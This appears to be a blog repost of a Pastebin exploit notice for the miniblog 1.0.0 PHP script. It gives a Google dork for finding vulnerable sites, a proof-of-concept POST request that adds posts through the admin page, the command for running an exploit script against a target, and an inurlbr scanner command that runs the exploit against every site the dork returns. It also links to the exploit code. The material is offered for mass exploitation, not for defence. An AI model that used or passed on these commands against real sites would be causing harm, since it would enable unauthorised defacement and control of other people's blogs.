# Vendor: http://www.spyka.net/scripts/php/miniblo
# Google Dork: intext:"Powered by miniblog" ext:php
# POC: http://{YOU_URL}/adm/admin.php?mode=add
# SEND REQUEST POST
adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
------------------------------------------------------------------------------
# EXECUTE: php xpl.php -t http://target.us
# FILE_OUTPUT : miniblog_vuln.txt
# EXPLOIT MASS USE SCANNER INURLBR
php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
------------------------------------------------------------------------------
*/
ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL
sumber: Pastebin
1 comments:
Post a Comment